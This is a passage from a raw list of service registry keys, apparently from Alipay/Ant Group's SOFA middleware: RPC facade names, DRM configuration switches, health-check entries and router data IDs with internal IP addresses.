PcreditLoanPostOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.query.api.ErcInstAccountQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkloanapprove_lnciaWorkFlowProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.article.facade.ArticleNewlyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfund.common.service.facade.manage.api.LocalCacheQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.commom.manage.facade.budget.api.BudgetAppendOrderService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fuelprod.facade.ShopTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.genericmerchant.facade.DeviceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-koutestaaaa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.SelectUserAdminQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.UnionDataRecoverFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobilelbs.common.service.facade.ReverseGeoCodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:stocktools_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cffilefactory@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-pcloaninsight-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:msgopprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscenesas.common.service.facade.api.query.SeaViewRoomFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echo.platform.playback.service.EchoPlaybackService:1.0:instfluxdecision@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:caprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:scardcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alifi.naegis.service.repay.RepayNewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.clientpg.MobilePgTemplateConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsTempManager.tabMyServiceGrayListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@intimateprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.ap.acquirecenter.common.service.facade.api.RefundApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.code.BasementTaskFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.censor:name=com.alipay.zcache.tbase.yingxutestGZTBaseCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.gfas:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.feeclcn.common.service.facade.v2.FeeConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.biz.service.impl.drm.AntqMsgMngResource.consumerRunModeDataAccess,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.BizSystemMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobileappcommon.common.service.facade.baas.CategoryPermissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.developertool.facade.resource.ExtensionVersionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:revmng-commissionPaymentBill@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_onestopmng_extTemplatGatewayService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mremindprod.common.service.facade.recommend.UserGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchaincustomer.facade.api.operation.OperationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassistantcore.common.service.facade.guide.api.HeaderGuideFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fraudmng.common.service.facade.strategy.api.CtuExcludeStrategy:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxposition.service.facade.book.BookQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acappcore.common.service.facade.buildpack.BuildpackFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmResourceTrigger.openAsynSaveFinanceDB,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finboss.common.service.facade.product.ProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.appcenter.SubappInfoCancelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_INSPECT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","HEALTHY_V2@cnamlmng#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.paychecker:name=com.alipay.zcache.log.paychecker.logLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpaas:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestPreIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestRZTBaseCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcache:name=com.alipay.zcache.tbase.hypTair.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finboss.common.service.facade.asset.UserAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.edeductcenter.common.service.facade.DeductBizActionCallBack:1.0:ebppprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:kbbp_unique_goods_update_biz_order_node_bPProcessCallbackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tr-service-enable:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.scardcenter.common.service.facade.OfflinepayLinkManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.datastore.DatastoreQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.20.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finbaservice.common.service.facade.match.api.MatchDomainManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finaicontentcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableHeadCarry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.faudioingest.common.service.facade.xnncloud.XnnCloudV2ToolServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dmirror:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.89.153#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antgroup.zmxy.zmdds.common.service.facade.api.DataDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.mng.TemplateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskdatacenter.service.facade.precheck.CapacityPreCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.easytest.agent.facade.DataExecutionFacade:1.0:ifxtrade_dataExecutionFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.prod.PayPasswordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.rabbit.common.service.facade.RabbitFrameQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accreditcore.common.service.facade.ManualAvailableAmountCalFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.contentlib.common.service.facade.material.SceneOfferMaterialConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.salesmng.common.service.facade.merchant.api.CrmMerchantQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.171#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:amldataproc@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulemng.common.service.facade.domain.RuleDomainService:1.0:promo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqResourceDrm.maxMessageSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_FOREX#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.mwalletmng.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:mobilepromo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.rdf.ficc.common.loadtestableschedule.drm.LoadTestableScheduleDrm.EC_finpwm_capital_fixed_investment_normal.loadTestEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.criskcenter.common.service.facade.strategycore.StrategyCallback:1.0:fakeStrategyCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:girisk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.prod.mng.ServProdCardInstService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:sffgroupworkbench@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.bankcard.facade.BankCardQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.12.5#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.porder.common.service.api.contract.ContractOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.177.215#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocreative.common.service.facade.generate.GenerateCommonIdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.obrevcore_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.icfmng.common.service.facade.api.TallyVoucherCreateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:realtimeExchangeLoader$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:openhome@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbadvert.common.service.facade.api.ContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.counter.api.CounterQueryFacadeV4:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscenemigrate.common.service.facade.api.SyncDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.common.service.facade.manage.SearchRecommendManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.facade.DecisionService:1.0:uioservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.admin.MiniAppDomainApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.dataqualityOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.15.240.111#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zqualitywalleetoe.common.service.integration.proxy.WalleProxy:1.0:execute-online@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.antha.ha.AnthaWarningManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.statusbar.common.service.StatusbarTemplateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.mif.common.service.facade.MerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.streammedia.common.service.facade.LiveSecurityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trsbrain.common.service.facade.service.SelfCureRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.metadata.service.CommonService:1.0:commonService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@rcswitchbase#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.mservicesinspect.common.service.integration.mydds.BroadNamePred2Client:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.antqnamesrv:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.customscenter.common.service.facade.declare.api.DeclareQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.cloudinc.core.dns.drm.DnsCommonDrmResource.clusterMapping,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchportalcore.common.service.clerktone.facade.api.agreement.UserAgreementManageGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:sophon@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bcm.common.service.facade.PgpOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","openevent@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:zonemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iglobalfundcontrol.common.config.api.IntercompanyFundAccountQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.troublehunter.common.service.facade.api.DiagnosisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.165.169.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.248.120#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.findecision.common.service.facade.route.RouteServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ecdcc:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.partner.PartnerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.ControltowerEventService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mobileufs@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fppolicygw.facade.approval.AgdsGenericApprovalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rule.common.base.service.ScriptValidateService:1.0:${rule_service_unique_id}@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.zdal.ldc.tair.customerv2.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintradecenter.common.service.facade.test.StructuredDepositsDataProcessTest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.revtransTairCache.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.kbdatafactory.DataDistributeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayRemindDrmResource.poison,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.custcpt.facade.AccountOrderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.SidecarOdpAppRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.yebcore.common.facade.subcard.query.SubCardCancelCallbackService:1.0:mwealthprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.SpOperatorManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mrchmobile@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.api.DeliverGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.isasp.service.facade.psbp.InsuranceTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.finaccenter.facade.api.FinAccountingControlOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","io.sofastack.cafe.workflowx.client.facade.WorkflowxOperationFacadeV2:1.0:WORKFLOWX_CLIENT@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.148.222#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.Arch:name=com.alipay.cif.client.drm.ClientLogControlDrmSwitch.fraudmng.censusLogSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.160.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinquotationprod.common.service.facade.api.StockNewShareFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.idmp.common.service.facade.api.dmp.LabelServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.routeClient:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.switch2NewPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:uniqueTransferRuleExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.signcontract.CommoditiesLocalArrangementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:APPXPROD@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-gmodelcenter-schedule#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.common.service.facade.execute.ManualOrderFacade:1.0:opscloudflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfinancial.antchain.cloud.endpoint.facade.BrowserDetailsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vehownerprod.facade.EtcDistributePlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlecenter.common.service.facade.SettleBatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_1302#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.73.182.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.paramcore.common.service.spi.ParmMntListSyncDevSpi:1.0:masterdata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.enterprisesteward.operator.EnterpriseStewardOperatorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:hb_product_order_cancelled_handler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.66.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.exratecenter.service.facade.api.ExRateCodeMappingQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.admin.TinyAppLimitConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.dataanalyzer.ReferenceAnalyzerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.api.AssetTransQueryFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.enterprise.facade.EntRolePrincipalRelationConsistQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.124.46#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_F_ACPLATFORM_LOADTEST_T#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.reading.common.service.facade.scene.SceneContentGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.core.service.process.ServiceTask:1.0:nomoDataExportServiceTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkpaycore.common.service.facade.DepositVerifyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:tradecore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.MobileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityidentify.certcmd.facade.CertCmdService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipaySecurePasswordTairCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minicenter.common.service.facade.api.ampf.InvokeAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.tax.TaxReceiptMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","mrchiscore@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.acctrans.core.inner.api.AccountQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.loancore.common.service.facade.alipay.api.rzone.query.ZlcRepayPlanQueryRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.ChatProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.business.BusinessMngQueryFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ialicore:name=com.ipay.ialicore.common.drm.RegionStatusSwitch.regionForwardConfigWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:hpmweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.mpoint.facade.MpointAdjustService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincapacity.biz.facade.MoneyRollbackMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.prodmng.api.FundItemPreviewQueryMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.core.service.framework.itask.api.TaskService:1.0:itaskService@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.AddressCodeQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intimateprod.common.service.facade.api.taskcenter.TaskPlanTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.248.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilelbs.common.service.facade.weather.LatestWeatherServiceInCzone:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.consumer.SendEventConsumeCenterFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipHvpsResource.taskMaxRetryCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.custdecision.service.questionnaire.QuestionnaireDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.contentlib.common.service.api.workbench.WorkbenchProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbitemrp.common.service.facade.RuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:price-and-fee-check@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageConsumeService:1.0:hainaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.rabbit.common.service.facade.RabbitAbilityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipaybuserviceAuthTairCache.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ccr.facade.InstalmentQuotaCompensationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipa